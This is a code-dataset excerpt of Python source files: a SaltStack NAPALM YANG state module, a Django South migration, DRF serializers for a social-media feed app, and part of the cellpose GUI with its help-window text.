hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e500e5e44932d22bec329b49d0c02e6c9e60ba18
| 10,187
|
py
|
Python
|
salt/states/netyang.py
|
xiaowei582648206/saltx
|
1d17b030b973ce5422e0fbe7e17c98c7ca91c49b
|
[
"Apache-2.0"
] | 1
|
2022-02-09T06:40:14.000Z
|
2022-02-09T06:40:14.000Z
|
salt/states/netyang.py
|
xiaowei582648206/saltx
|
1d17b030b973ce5422e0fbe7e17c98c7ca91c49b
|
[
"Apache-2.0"
] | null | null | null |
salt/states/netyang.py
|
xiaowei582648206/saltx
|
1d17b030b973ce5422e0fbe7e17c98c7ca91c49b
|
[
"Apache-2.0"
] | 4
|
2020-11-04T06:28:05.000Z
|
2022-02-09T10:54:49.000Z
|
# -*- coding: utf-8 -*-
'''
NAPALM YANG state
=================
Manage the configuration of network devices according to
the YANG models (OpenConfig/IETF).
.. versionadded:: 2017.7.0
Dependencies
------------
- napalm-yang
- pyangbing > 0.5.11
To be able to load configuration on network devices,
it requires NAPALM_ library to be installed: ``pip install napalm``.
Please check Installation_ for complete details.
.. _NAPALM: https://napalm.readthedocs.io
.. _Installation: https://napalm.readthedocs.io/en/latest/installation.html
'''
from __future__ import absolute_import
import json
import logging
log = logging.getLogger(__file__)
# Import third party libs
try:
import yaml
# pylint: disable=W0611
import napalm_yang
HAS_NAPALM_YANG = True
# pylint: enable=W0611
except ImportError:
HAS_NAPALM_YANG = False
# Import salt modules
from salt.utils import fopen
import salt.utils.napalm
# ------------------------------------------------------------------------------
# state properties
# ------------------------------------------------------------------------------
__virtualname__ = 'napalm_yang'
# ------------------------------------------------------------------------------
# global variables
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
def __virtual__():
'''
NAPALM library must be installed for this module to work and run in a (proxy) minion.
This module in particular requires also napalm-yang.
'''
if not HAS_NAPALM_YANG:
return (False, 'Unable to load napalm_yang execution module: please install napalm-yang!')
return salt.utils.napalm.virtual(__opts__, __virtualname__, __file__)
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def managed(name,
data,
models,
**kwargs):
'''
Manage the device configuration given the input data strucuted
according to the YANG models.
data
YANG structured data.
models
A list of models to be used when generating the config.
profiles: ``None``
Use certain profiles to generate the config.
If not specified, will use the platform default profile(s).
compliance_report: ``False``
Return the compliance report in the comment.
The compliance report structured object can be found however
in the ``pchanges`` field of the output (not displayed on the CLI).
.. versionadded:: 2017.7.3
test: ``False``
Dry run? If set as ``True``, will apply the config, discard
and return the changes. Default: ``False`` and will commit
the changes on the device.
commit: ``True``
Commit? Default: ``True``.
debug: ``False``
Debug mode. Will insert a new key under the output dictionary,
as ``loaded_config`` containing the raw configuration loaded on the device.
replace: ``False``
Should replace the config with the new generate one?
State SLS example:
.. code-block:: jinja
{%- set expected_config = pillar.get('openconfig_interfaces_cfg') -%}
interfaces_config:
napalm_yang.managed:
- data: {{ expected_config | json }}
- models:
- models.openconfig_interfaces
- debug: true
Pillar example:
.. code-block:: yaml
openconfig_interfaces_cfg:
_kwargs:
filter: true
interfaces:
interface:
Et1:
config:
mtu: 9000
Et2:
config:
description: "description example"
'''
ret = salt.utils.napalm.default_ret(name)
test = kwargs.get('test', False) or __opts__.get('test', False)
debug = kwargs.get('debug', False) or __opts__.get('debug', False)
commit = kwargs.get('commit', True) or __opts__.get('commit', True)
replace = kwargs.get('replace', False) or __opts__.get('replace', False)
return_compliance_report = kwargs.get('compliance_report', False) or __opts__.get('compliance_report', False)
profiles = kwargs.get('profiles', [])
temp_file = __salt__['temp.file']()
log.debug('Creating temp file: {0}'.format(temp_file))
if 'to_dict' not in data:
data = {'to_dict': data}
data = [data]
with fopen(temp_file, 'w') as file_handle:
yaml.safe_dump(json.loads(json.dumps(data)), file_handle, encoding='utf-8', allow_unicode=True)
device_config = __salt__['napalm_yang.parse'](models,
config=True,
profiles=profiles)
log.debug('Parsed the config from the device:')
log.debug(device_config)
compliance_report = __salt__['napalm_yang.compliance_report'](device_config,
models,
filepath=temp_file)
log.debug('Compliance report:')
log.debug(compliance_report)
complies = compliance_report.get('complies', False)
if complies:
ret.update({
'result': True,
'comment': 'Already configured as required.'
})
log.debug('All good here.')
return ret
log.debug('Does not comply, trying to generate and load config')
data = data[0]['to_dict']
if '_kwargs' in data:
data.pop('_kwargs')
loaded_changes = __salt__['napalm_yang.load_config'](data,
models,
profiles=profiles,
test=test,
debug=debug,
commit=commit,
replace=replace)
log.debug('Loaded config result:')
log.debug(loaded_changes)
__salt__['file.remove'](temp_file)
loaded_changes['compliance_report'] = compliance_report
return salt.utils.napalm.loaded_ret(ret,
loaded_changes,
test,
debug,
opts=__opts__,
compliance_report=return_compliance_report)
def configured(name,
data,
models,
**kwargs):
'''
Configure the network device, given the input data strucuted
according to the YANG models.
.. note::
The main difference between this function and ``managed``
is that the later generates and loads the configuration
only when there are differences between the existing
configuration on the device and the expected
configuration. Depending on the platform and hardware
capabilities, one could be more optimal than the other.
Additionally, the output of the ``managed`` is different,
in such a way that the ``pchange`` field in the output
contains structured data, rather than text.
data
YANG structured data.
models
A list of models to be used when generating the config.
profiles: ``None``
Use certain profiles to generate the config.
If not specified, will use the platform default profile(s).
test: ``False``
Dry run? If set as ``True``, will apply the config, discard
and return the changes. Default: ``False`` and will commit
the changes on the device.
commit: ``True``
Commit? Default: ``True``.
debug: ``False``
Debug mode. Will insert a new key under the output dictionary,
as ``loaded_config`` containing the raw configuration loaded on the device.
replace: ``False``
Should replace the config with the new generate one?
State SLS example:
.. code-block:: jinja
{%- set expected_config = pillar.get('openconfig_interfaces_cfg') -%}
interfaces_config:
napalm_yang.configured:
- data: {{ expected_config | json }}
- models:
- models.openconfig_interfaces
- debug: true
Pillar example:
.. code-block:: yaml
openconfig_interfaces_cfg:
_kwargs:
filter: true
interfaces:
interface:
Et1:
config:
mtu: 9000
Et2:
config:
description: "description example"
'''
ret = salt.utils.napalm.default_ret(name)
test = kwargs.get('test', False) or __opts__.get('test', False)
debug = kwargs.get('debug', False) or __opts__.get('debug', False)
commit = kwargs.get('commit', True) or __opts__.get('commit', True)
replace = kwargs.get('replace', False) or __opts__.get('replace', False)
profiles = kwargs.get('profiles', [])
if '_kwargs' in data:
data.pop('_kwargs')
loaded_changes = __salt__['napalm_yang.load_config'](data,
models,
profiles=profiles,
test=test,
debug=debug,
commit=commit,
replace=replace)
return salt.utils.napalm.loaded_ret(ret, loaded_changes, test, debug)
| 35.371528
| 113
| 0.52194
|
0af5033bb269c91d17e8ec3622a5e20b0f0044f6
| 18,152
|
py
|
Python
|
tbonlineproject/post/migrations/0013_auto__add_editorchoice.py
|
nathangeffen/tbonline3
|
1b8a3af8d2dc1ee8083ca6638d025e94bd98f253
|
[
"MIT"
] | null | null | null |
tbonlineproject/post/migrations/0013_auto__add_editorchoice.py
|
nathangeffen/tbonline3
|
1b8a3af8d2dc1ee8083ca6638d025e94bd98f253
|
[
"MIT"
] | 3
|
2021-06-08T23:57:13.000Z
|
2022-01-13T03:42:01.000Z
|
tbonlineproject/post/migrations/0013_auto__add_editorchoice.py
|
nathangeffen/tbonline-2
|
0d5869197e66a0057fa07cb99f21dde7f5b47c30
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'EditorChoice'
db.create_table('post_editorchoice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('comment', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['comments.Comment'], unique=True)),
('editors_choice', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('post', ['EditorChoice'])
def backwards(self, orm):
# Deleting model 'EditorChoice'
db.delete_table('post_editorchoice')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': "orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'copyright.copyright': {
'Meta': {'ordering': "['title']", 'object_name': 'Copyright'},
'easy_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'html_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legal_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'credit.credit': {
'Meta': {'ordering': "['last_name', 'first_names']", 'object_name': 'Credit'},
'first_names': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_person': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'credit.orderedcredit': {
'Meta': {'ordering': "['position']", 'unique_together': "(('credit', 'content_type', 'object_id'),)", 'object_name': 'OrderedCredit'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'credit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['credit.Credit']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'gallery.gallery': {
'Meta': {'ordering': "['-last_modified']", 'object_name': 'Gallery'},
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['gallery.Image']", 'null': 'True', 'through': "orm['gallery.OrderedImage']", 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'gallery.image': {
'Meta': {'ordering': "['-last_modified']", 'object_name': 'Image'},
'caption': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'file': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'preferred_size': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'gallery.orderedimage': {
'Meta': {'ordering': "['gallery', 'position']", 'unique_together': "(('gallery', 'image'),)", 'object_name': 'OrderedImage'},
'gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Image']"}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'post.basicpost': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'unique_together': "(('slug', 'date_published'),)", 'object_name': 'BasicPost'},
'allow_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'body': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']", 'null': 'True', 'blank': 'True'}),
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'detail_post_css_classes': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'detail_post_template': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'homepage': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'introduction': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'list_post_css_classes': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'list_post_template': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'pullout_text': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'sticky': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'teaser': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'post.editorchoice': {
'Meta': {'object_name': 'EditorChoice'},
'comment': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['comments.Comment']", 'unique': 'True'}),
'editors_choice': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'post.postwithembeddedobject': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithEmbeddedObject', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'detail_post_embedded_html': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\H'", 'blank': 'True'}),
'list_post_embedded_html': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\H'", 'blank': 'True'})
},
'post.postwithimage': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithImage', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Image']", 'null': 'True', 'blank': 'True'})
},
'post.postwithsimpleimage': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithSimpleImage', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'post.postwithslideshow': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithSlideshow', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']", 'null': 'True', 'blank': 'True'}),
'slideshow_options': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'post.submittedarticle': {
'Meta': {'object_name': 'SubmittedArticle'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'submitted_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'submitted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'tagging.tag': {
'Meta': {'ordering': "('name',)", 'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['post']
| 81.035714
| 210
| 0.55498
|
8d352f7a6d126cb9ca9388638dfaae9c860b5f91
| 3,045
|
py
|
Python
|
src/igfeedservice/IgFeedService/serializers.py
|
MatthewWong68/Social_Media_RESTful_API_Django_Web_App
|
60d0f2af067071bc8fc6f9da4a810d35bfad3443
|
[
"MIT"
] | null | null | null |
src/igfeedservice/IgFeedService/serializers.py
|
MatthewWong68/Social_Media_RESTful_API_Django_Web_App
|
60d0f2af067071bc8fc6f9da4a810d35bfad3443
|
[
"MIT"
] | null | null | null |
src/igfeedservice/IgFeedService/serializers.py
|
MatthewWong68/Social_Media_RESTful_API_Django_Web_App
|
60d0f2af067071bc8fc6f9da4a810d35bfad3443
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from .models import Post, Hashtag, Page
# from .models import PostHistory
class PostSerializer(serializers.Serializer):
id = serializers.CharField(max_length=31)
full_text = serializers.CharField(max_length=8191)
author_name = serializers.CharField(max_length=255)
crawled_dt = serializers.DateTimeField()
post_dt = serializers.DateTimeField()
like = serializers.IntegerField(default=0)
comment = serializers.IntegerField(default=0)
# Create <=> POST
def create(self, validated_data):
return Post.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.full_text = validated_data.get('full_text', instance.full_text)
instance.author_name = validated_data.get('author_name', instance.author_name)
instance.crawled_dt = validated_data.get('crawled_dt', instance.crawled_dt)
instance.post_dt = validated_data.get('post_dt', instance.post_dt)
instance.like = validated_data.get('like', instance.like)
instance.comment = validated_data.get('comment', instance.comment)
instance.save()
return instance
class HashtagSerializer(serializers.Serializer):
id = serializers.IntegerField()
feedID = serializers.CharField(max_length=20)
text = serializers.CharField(max_length=255)
# Create <=> POST
def create(self, validated_data):
return Hashtag.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.feedID = validated_data.get('feedID', instance.feedID)
instance.text = validated_data.get('text', instance.text)
instance.save()
return instance
class PageSerializer(serializers.Serializer):
id = serializers.IntegerField()
author_name = serializers.CharField(max_length=255)
posts = serializers.IntegerField(default=0)
followers = serializers.IntegerField(default=0)
following = serializers.IntegerField(default=0)
# Create <=> POST
def create(self, validated_data):
return Page.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.author_name = validated_data.get('author_name', instance.author_name)
instance.posts = validated_data.get('posts', instance.posts)
instance.followers = validated_data.get('followers', instance.followers)
instance.following = validated_data.get('following', instance.following)
instance.save()
return instance
# class PostHistorySerializer(serializers.Serializer):
# # Create <=> POST
# def create(self, validated_data):
# return PostHistory.objects.create(**validated_data)
| 41.148649
| 87
| 0.693596
|
3a8fb87ee84b095d3cdc59036a74c044a9258674
| 24,763
|
py
|
Python
|
cellpose/guiparts.py
|
Czaki/cellpose
|
fe3a0f9c18323faffd05fffe760dc29db22624f6
|
[
"BSD-3-Clause"
] | 1
|
2020-08-11T13:04:37.000Z
|
2020-08-11T13:04:37.000Z
|
cellpose/guiparts.py
|
Czaki/cellpose
|
fe3a0f9c18323faffd05fffe760dc29db22624f6
|
[
"BSD-3-Clause"
] | null | null | null |
cellpose/guiparts.py
|
Czaki/cellpose
|
fe3a0f9c18323faffd05fffe760dc29db22624f6
|
[
"BSD-3-Clause"
] | null | null | null |
from PyQt5 import QtGui, QtCore, QtWidgets
import pyqtgraph as pg
from pyqtgraph import functions as fn
from pyqtgraph import Point
import numpy as np
class HelpWindow(QtGui.QDialog):
def __init__(self, parent=None):
super(HelpWindow, self).__init__(parent)
self.setGeometry(100,100,700,800)
self.setWindowTitle('cellpose help')
self.win = QtGui.QWidget(self)
layout = QtGui.QGridLayout()
self.win.setLayout(layout)
text = ('''
<p class="has-line-data" data-line-start="5" data-line-end="6">Main GUI mouse controls:</p>
<ul>
<li class="has-line-data" data-line-start="7" data-line-end="8">Pan = left-click + drag</li>
<li class="has-line-data" data-line-start="8" data-line-end="9">Zoom = scroll wheel</li>
<li class="has-line-data" data-line-start="9" data-line-end="10">Full view = double left-click</li>
<li class="has-line-data" data-line-start="10" data-line-end="11">Select mask = left-click on mask</li>
<li class="has-line-data" data-line-start="11" data-line-end="12">Delete mask = Ctrl + left-click</li>
<li class="has-line-data" data-line-start="12" data-line-end="13">Start draw mask = right-click</li>
<li class="has-line-data" data-line-start="13" data-line-end="15">End draw mask = right-click, or return to circle at beginning</li>
</ul>
<p class="has-line-data" data-line-start="15" data-line-end="16">Overlaps in masks are NOT allowed. If you draw a mask on top of another mask, it is cropped so that it doesn’t overlap with the old mask. Masks in 2D should be single strokes (single stroke is checked). If you want to draw masks in 3D (experimental), then you can turn this option off and draw a stroke on each plane with the cell and then press ENTER. 3D labelling will fill in planes that you have not labelled so that you do not have to as densely label.</p>
<p class="has-line-data" data-line-start="17" data-line-end="18">!NOTE!: The GUI automatically saves after you draw a mask in 2D but NOT after 3D mask drawing and NOT after segmentation. Save in the file menu or with Ctrl+S. The output file is in the same folder as the loaded image with <code>_seg.npy</code> appended.</p>
<table class="table table-striped table-bordered">
<br><br>
<thead>
<tr>
<th>Keyboard shortcuts</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>CTRL+Z</td>
<td>undo previously drawn mask/stroke</td>
</tr>
<tr>
<td>CTRL+0</td>
<td>clear all masks</td>
</tr>
<tr>
<td>CTRL+L</td>
<td>load image (can alternatively drag and drop image)</td>
</tr>
<tr>
<td>CTRL+S</td>
<td>SAVE MASKS IN IMAGE to <code>_seg.npy</code> file</td>
</tr>
<tr>
<td>CTRL+P</td>
<td>load <code>_seg.npy</code> file (note: it will load automatically with image if it exists)</td>
</tr>
<tr>
<td>CTRL+M</td>
<td>load masks file (must be same size as image with 0 for NO mask, and 1,2,3… for masks)</td>
</tr>
<tr>
<td>CTRL+N</td>
<td>load numpy stack (NOT WORKING ATM)</td>
</tr>
<tr>
<td>A/D or LEFT/RIGHT</td>
<td>cycle through images in current directory</td>
</tr>
<tr>
<td>W/S or UP/DOWN</td>
<td>change color (RGB/gray/red/green/blue)</td>
</tr>
<tr>
<td>PAGE-UP / PAGE-DOWN</td>
<td>change to flows and cell prob views (if segmentation computed)</td>
</tr>
<tr>
<td>, / .</td>
<td>increase / decrease brush size for drawing masks</td>
</tr>
<tr>
<td>X</td>
<td>turn masks ON or OFF</td>
</tr>
<tr>
<td>Z</td>
<td>toggle outlines ON or OFF</td>
</tr>
<tr>
<td>C</td>
<td>cycle through labels for image type (saved to <code>_seg.npy</code>)</td>
</tr>
</tbody>
</table>
